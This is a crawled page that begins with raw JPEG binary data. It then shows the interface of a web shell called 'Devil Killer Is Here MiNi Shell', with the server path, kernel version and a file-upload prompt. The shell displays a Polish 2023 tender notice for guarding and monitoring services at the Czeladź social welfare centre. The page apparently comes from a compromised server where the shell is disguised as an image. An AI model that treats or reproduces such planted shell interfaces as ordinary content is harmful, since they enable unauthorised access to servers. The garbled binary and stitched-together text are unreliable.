JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231102/0047404901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona fizyczna osób i mienia wraz z monitoringiem w Miejskim Ośrodku Pomocy Społecznej w Czeladzi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej w Czeladzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003450413</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">17 Lipca 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czeladź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-250</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mops@mops.czeladz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mops.czeladz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona fizyczna osób i mienia wraz z monitoringiem w Miejskim Ośrodku Pomocy Społecznej w Czeladzi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-90ba7b39-797c-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00474049</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00021940/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Ochrona fizyczna osób i mienia wraz z monitoringiem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/instrukcje.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27.4.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4.5.2016 r., str. 1), dalej „RODO”, informuję, że: <br/>1. Administratorem Pani/Pana danych osobowych jest MOPS, ul. 17 Lipca 27, 41-250 Czeladź<br/>2. W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych (IOD): e-mail: iodo@mops.czeladz.pl, tel.32/265-14-42 <br/>3. Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania i udzielenia zamówienia, prowadzenia dokumentacji księgowo - podatkowej, archiwizacji danych, dochodzenia roszczeń lub obrony przed roszczeniami.<br/>4. Podstawą przetwarzania danych osobowych jest:<br/>a) ustawa z 11.9.2019 r. – Prawo zamówień publicznych;<br/>b) ustawa z 27.8.2009 r. o finansach publicznych;<br/>c) ustawa z 14.7.1983 r. o narodowym zasobie archiwalnym i archiwach;<br/>d) art. 6 pkt.1 lit. c RODO – przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.<br/>5. Odbiorca lub kategorie odbiorców: Podmioty upoważnione na podst. zawartych umów powierzenia oraz uprawnione na mocy obowiąz. przepisów prawa, w szczególności osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania na podstawie art. 18 oraz art. 74- 76 PZP. Zasada jawności ma zastos. do wszystkich danych os. z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO (szczególna kategoria danych).<br/>6. Zebrane dane będą przechowywane przez okres nie dłuższy, niż jest to niezbędne do celów, w których dane te są przetwarzane oraz do celów archiwizacyjnych, na podstawie art. 22d ust. 2 Ustawy z dnia 17 lipca 1983r. o narodowym zasobie archiwalnym i archiwach, zgodnie z JRW Akt, stanowiącym załącznik do Zarządzenia Nr 5/2020 Dyrektora MOPS w Czeladzi z dnia 3 lutego 2020 r. - zgodnie z art. 78 ust. 1 i 4 PZP przez okres 4 lat od dnia zakończenia postęp. o udzielenie zam., a jeżeli okres obowiązywania umowy w sprawie zam. publ. przekracza 4 lata – przez cały okres obowiązywania umowy. <br/>7. Posiada Pani/Pan prawo:<br/>a) żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku, wymagałoby niewspółmiernie dużego wysiłku, zam. może zgodnie z art. 75 PZP żądać od osoby, której dane dotyczą, wskazania dodatkowych infor. mających na celu sprecyzowanie nazwy lub daty zakończonego postęp. o udzielenie zam.;<br/>b) żądania sprostowania lub uzupełnienia danych os.; zgodnie z art. 76 PZP wykonanie tego obowiązku nie może naruszać integralności protokołu postępowania oraz jego zał.;<br/>c) usunięcia danych, w przypadku gdy dane osobowe nie są już niezbędne do celów,<br/>w których zostały zebrane lub w inny sposób przetwarzane;<br/>d) żądania ograniczenia przetwarzania danych os.; zgodnie z art. 74 ust. 3 PZP wykonanie tego obowiązku nie ogranicza przetwarzania danych os. do czasu zakończenie postęp. o udzielenie zam.<br/>8. Przysługuje Pani/Pan prawo do wniesienia skargi do organu nadzorczego, tj. UODO ul. Stawki 2, 00-913 Warszawa.<br/>9. Pani/Pana dane osobowe nie będą poddawane zautomatyzowanemu podejmowaniu decyzji, w tym również profilowaniu.<br/>10. Pani/Pana dane osobowe nie będą przekazywane do państw trzecich.<br/>11. Podanie danych os. jest wymogiem ustawowym określonym w przepisach PZP, związanych z udziałem w postęp. o udzielenie zam.; konsekwencje niepodania określonych danych wynikają z PZP.<br/>12. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.8.U.MOPS.23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 227112,83 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Ochrona fizyczna osób i mienia wraz z monitoringiem wizyjnym oraz monitoringiem systemu alarmowego w siedzibie Miejskiego Ośrodka Pomocy Społecznej w Czeladzi przy ul. 17 Lipca 27 oraz ochrona osób i mienia w trakcie wydawania posiłków w Punkcie Żywienia nr 1 w Czeladzi przy ul. 17 Lipca 27, <br/>1.1.	Ochrona fizyczna budynku, instalacji, urządzeń, sprzętu oraz innych składników majątku<br/>w godzinach od 6:00 do 18:00. <br/>1.2 Ochrona osób mająca na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osobistej, w czasie godzin urzędowania Zamawiającego, (tj. od poniedziałku do piątku):<br/> poniedziałek od godz. 7:30 do 17:00<br/> wtorek - czwartek od godz. 7:30 do 15:30<br/> piątek od godz. 7:30 do 14:00.<br/>1.3.	W razie potrzeby reakcja na sygnał grupą interwencyjną.<br/>1.4. Wydawanie i przyjmowanie kluczy do pomieszczeń Zamawiającego osobom uprawnionym.<br/>1.5.	Sprawdzanie pomieszczeń (w tym sanitarnych, piwnic) pod kątem zabezpieczenia (np. zamknięte okna, opuszczone żaluzje antywłamaniowe) po godzinach urzędowania Zamawiającego oraz przed zakończeniem ochrony fizycznej.<br/>1.6.	Kontrola wszystkich pomieszczeń po godzinach urzędowania Zamawiającego.<br/>1.7.	Sprawdzanie, czy osoby przebywające w pomieszczeniach Zamawiającego po godzinach pracy są do tego upoważnione. <br/>1.8.	Niewpuszczanie na teren siedziby Zamawiającego osób znajdujących się pod wpływem alkoholu<br/>1.9.	Codzienne obchody wokół granicy budynku i pisemny raport o czasie, miejscu i rodzaju zdarzenia nadzwyczajnego.<br/>1.10.	Prowadzenie książki raportów, w której winien być udokumentowany pisemnie przebieg służby (przede wszystkim zdarzenia nadzwyczajne) oraz wnioski i sugestie Wykonawcy dotyczące realizacji przedmiotu usługi, a także uwagi na temat niedociągnięć stwierdzonych przez Zamawiającego w czasie służby. Książka raportów winna być przedstawiona do wglądu na każde życzenie Zamawiającego. <br/>1.11.	W przypadku zaistnienia zdarzeń zagrażających funkcjonowaniu Ośrodka (po godzinach pracy Zamawiającego) powiadomienie osób funkcyjnych, tj. Dyrektora Ośrodka lub Kierownika Działu Administracji, zabezpieczenie miejsca zdarzenia do czasu ustalenia okoliczności przyczyn zaistnienia zdarzenia i do czasu przybycia wyspecjalizowanych służb (Straży Pożarnej, Policji, Pogotowia Ratunkowego).<br/>1.12.	Sprawdzanie stanu zabezpieczeń, oświetlenia zewnętrznego, instalacji sanitarnych, CO, p.poż. i innych znajdujących się w Ośrodku. W przypadku zaistnienia usterek, powiadomienie o nich Zamawiającego. <br/>1.13.	Codzienne sprawdzanie i obsługa elektronicznych zabezpieczeń alarmowych, a w przypadku zaistnienia usterek powiadamianie o nich Zamawiającego.<br/>1.14.	Włączanie systemu alarmowego, zamykanie Ośrodka i zabezpieczanie kluczy.<br/>1.15.	Wyłączanie systemu alarmowego, otwieranie Ośrodka.<br/>1.16.	Ochrona fizyczna budynku, instalacji, urządzeń, sprzętu oraz innych składników majątku podczas wyborów prezydenckich, parlamentarnych (krajowych oraz do europarlamentu)<br/>i samorządowych, w godzinach prac komisji wyborczej w sytuacji, gdy lokal wyborczy będzie zlokalizowany w siedzibie MOPS.<br/>1.17.	Ochrona osób i mienia w trakcie wydawania posiłków w Punkcie Żywienia nr 1 w Czeladzi przy ul. 17 Lipca 27:<br/>1. Wydawanie posiłków odbywa się od poniedziałku do piątku w godzinach: Punkt Żywienia<br/>Nr 1 - ul. 17 Lipca 27 w Czeladzi w godz. od 12:30 do 14:30,<br/> 2. Niewpuszczanie na teren Punktów Żywienia Nr 1 osób znajdujących się pod wpływem alkoholu i innych środków odurzających.<br/> 3. W przypadku wystąpienia zdarzeń nadzwyczajnych, podejmowanie czynności zapobiegawczo interwencyjnych oraz sporządzenie pisemnego raportu o wystąpieniu zdarzenia.<br/> 4. W razie potrzeby reakcja na sygnał grupą interwencyjną.<br/> 5. W przypadku zaistnienia zdarzeń zagrażających zdrowiu czy życiu osób lub funkcjonowaniu Punktu Żywienia Nr 1, powiadamianie osób funkcyjnych o zdarzeniu, udzielenie pierwszej pomocy poszkodowanym i zabezpieczenie miejsca zdarzenia do czasu przybycia wyspecjalizowanych służb (Straży Pożarnej, Policji, Pogotowia Ratunkowego).<br/>1.18. Monitoring<br/>1.	System monitoringu obejmuje:<br/>a)	Budynek przy ul. 17 Lipca 27 - (kamery zewnętrzne - 7 sztuk). <br/>b)	Budynek przy ul. 17 Lipca 12 - (kamery zewnętrzne - 2 sztuki; kamery wewnętrzne –<br/>3 sztuki).<br/>2.	Obsługa monitoringu realizuje:<br/>a)	bieżącą obserwację (nadzór) kamer systemu monitoringu, <br/>b)	w sytuacjach zaobserwowanych zagrożeń, wypadków, zdarzeń, natychmiastowe powiadamianie grupy interwencyjnej i/lub wyspecjalizowanych służb (np. Straży Pożarnej, Policji, Pogotowia Ratunkowego). <br/>c)	niezwłoczne powiadamianie przedstawiciela Zamawiającego o wszelkich zaobserwowanych zdarzeniach, awariach sprzętu i raportowanie zauważonych nieprawidłowości w sprawności kamer i innych urządzeń systemu monitoringu,<br/>1.19	Pracownik ochrony obsługujący system monitoringu zobowiązany jest: <br/>1.	zachować w poufności przetwarzane dane osobowe oraz sposób ich zabezpieczenia, w tym podpisać zobowiązanie, w którym oświadczy, że nie będzie przekazywać, pokazywać lub w inny sposób ujawniać treści nagrań wideo z nadzoru nikomu, kto nie jest uprawniony do dostępu do nich, <br/>2.	efektywnie współpracować z Policją w zakresie bezpieczeństwa ludzi i mienia, spokoju<br/>i porządku publicznego oraz wymiany informacji w tym zakresie z obserwowanych<br/>i rejestrowanych zdarzeń w miejscach publicznych.<br/>3.	Pracownicy Wykonawcy nie mają prawa do przyjmowania osób postronnych na terenie strzeżonych obiektów. <br/>1.20. Wykonawca zobowiązany jest do: <br/>1) prowadzenia nadzoru nad prawidłową i nieprzerwaną pracą operatorów systemu oraz urządzeń monitoringu, <br/>2) chronić system monitoringu przed dostępem i ingerencją z zewnątrz przez zastosowanie środków technicznych i organizacyjnych zapewniających ochronę przetwarzanych danych osobowych, zabezpieczyć dane przed ich udostępnieniem osobom nieupoważnionym oraz działać zgodnie z ustawą z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz. U. z 2019 r. poz. 1781)<br/>1.21.	Monitorowanie sygnałów pochodzących z systemów alarmowych Ośrodka całodobowo.<br/>1.22	Wykonawca jest zobowiązany do odbioru przez Alarmowe Centrum Odbiorcze sygnałów alarmowych i technicznych, generowanych przez lokalny system alarmowy klasy &#34;C&#34;.<br/>1.23.	W przypadku stwierdzenia zakłóceń porządku lub zadziałania systemu sygnalizacji włamania, podejmowanie działań interwencyjnych własnymi grupami interwencyjnymi - czas przyjazdu maksymalnie do 10 minut. W trakcie trwania umowy Zamawiający może dwukrotnie, bez dodatkowych opłat, dokonać kontroli czasu dojazdu grupy interwencyjnej do siedziby Zamawiającego (wezwania kontrolne). <br/>1.24.	Wykonawca przekazuje informacje o powstałym zagrożeniu w nadzorowanym obiekcie na stanowisko kierowania terytorialnie odpowiedzialnej jednostki Policji, celem podjęcia interwencji oraz powiadomienia osób wskazanych przez Zamawiającego.<br/>1.25.	Wykonawca zobowiązany jest do zgłoszenia Zamawiającemu każdego przypadku uszkodzenia bądź jakiejkolwiek innej niesprawności łącza telefonicznego, wykrytego przez stację monitorującą, mających wpływ na monitorowanie systemu alarmowego.<br/>1.26.	Wykonawca zobowiązany jest również do sporządzania i przedstawiania Zamawiającemu pisemnej notatki ze zdarzeń mających miejsce na terenie chronionego obiektu (podjazdy grup interwencyjnych, koordynowane przez Stację Monitorowania) i przesłania jej niezwłocznie na adres e-mail: mops@mops.czeladz.pl.<br/><br/>2.	Monitoring systemu alarmowego w lokalu MOPS przy ul. 17 Lipca 12 w Czeladzi całodobowo.<br/>2.1.	Wykonawca jest zobowiązany do odbioru przez Alarmowe Centrum Odbiorcze sygnałów alarmowych i technicznych, generowanych przez lokalny system alarmowy klasy C.<br/>2.2.	W przypadku stwierdzenia zakłóceń porządku lub zadziałania systemu sygnalizacji włamania, podejmowanie działań interwencyjnych własnymi grupami interwencyjnymi - czas przyjazdu do 10 minut. W trakcie trwania umowy Zamawiający może dwukrotnie, bez dodatkowych opłat dokonać kontroli czasu dojazdu grupy interwencyjnej do siedziby Zamawiającego (wezwania kontrolne). <br/>2.3.	Wykonawca przekazuje informacje o powstałym zagrożeniu w nadzorowanym obiekcie na stanowisko kierowania terytorialnie odpowiedzialnej jednostki Policji, celem podjęcia interwencji oraz powiadomienia osób wskazanych przez Zamawiającego.<br/>2.4	Wykonawca zobowiązany jest również do sporządzania i przedstawiania Zamawiającemu pisemnej notatki ze zdarzeń mających miejsce na terenie chronionego obiektu (podjazdy grup interwencyjnych, koordynowane przez Stację Monitorowania) i przesłania jej niezwłocznie na adres e-mail: mops@mops.czeladz.pl.<br/>2.5	Wyposażenie Zamawiającego w 2 sztuki pilot/przycisk antynapadowy po 1 dla każdej ze stron. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 68370,01 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zam kier się będzie następ kryt, z uwzgl odp współcz wag (znacz wyraż w %) dla<br/>tych kryt oraz maks il punk, jaką może otrzy of za dane kryt:1) Cena–waga procent-max60%(C) 2) Doś os wyz do reali zam-max40%<br/>(D)<br/>Of zost ocen za pom syst punkt, zg z poniż kryt:Kryt I-Cena of brutto(C)–max60%<br/>a) Zam przyzna maks licz 60punk of Wyk z najniż ceną brutto za wyk przed zam, zg z formulof, stan Zał nr1do nin.SWZ b) Ilość punk<br/>przyzn pozos of Wyk zost oblicz zg z nast. wz i zaokr do dwóch mjsc po przec<br/>najniższa cena występująca w ofertach<br/>ocena punktowa C = --------------------------------------------------- x60 cena badana<br/>Uw nr1:Zg z art. 225 ust. 2 u Pzp, jeżeli złoż of, któ wyb prowadz do pow u Zam obow podat zg z przep o podat od tow i usł, Zam w<br/>celu oc takiej of dolicz do przedst w niej ceny poda od tow i usł, który miał obow rozl zg z tymi przep. Wyk, skł of, infor Zam czy wyb<br/>of będzie prow do pows u Zam obow podatk, wskc nazwę (rodzaj) tow lub usł, któr dost lub świad będ prow do jego powst, oraz<br/>wskaz ich wart bez kwoty pod i staw podat od tow i usł, która zg z wied wyk będ miała zastose. W powyż przyp wyk pod w formul of<br/>tyl wart netto w odnies do wskaz zakr przed zam, zamieszw miejs przeznacz na wskaz ceny brutto prod stos inforo pow obow podat.<br/>Kryt II–Doś os wyznacz do reali zam(D) wg Zał nr 6<br/>Zam może przyznać maks licz 40pkt. of Wyk.- za wyznacz do reali zada os, która spośr wyznacz os nie posi doś w ochr os i mien<br/>Ogłoszenie nr 2022/BZP 00418056/01 z dnia 2022-10-31<br/>2022-10-31 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>Wyk otrz - 0pkt- za wyznacz do reali zad os, kt spoś wyznacz os posia najmni co naj12–mies doś w ochr os i mien Wyk otrz–20pktza<br/>wyzn do reali zad os któ spoś wyzna os pos najmn co najm24–miesi doś w ochr os i mien Wyk otr–40pkt W przyp skł of na wsz 3<br/>cz Wyk win wyk odp speł war odrę dla czI, dla czII, dla czIII. Uw nr 2: Przy obl pun Zam zase zaokr do dwóch miej po przec wedł<br/>zas, że trzecia cyf po przec od5 w górę powo zaokr drug cyf po przec w górę o1. Jeśli trze cyf po przec jest mniej niż5, to dru cyf po<br/>przec nie ule zmian Zam dok wyb of teg z Wyk, któ of uzy w wyn oc najw licz pun. Przyzn pun poszcz of odb się w oparo wzór: L = C<br/>+ D gdz:<br/>L-lic pun uzys przez of C–licz pun uzys w kryt&#34;cena&#34;.D–licz pun uzy w kryt&#34;Doś os wyznacz do reali zam&#34;<br/>2. Oc bę podl wył of nie podl odrz<br/>3. Za najkorzy zost uz of kt otrz najwi il punk łącz ze wszys kryt<br/>4. W syt, gdy 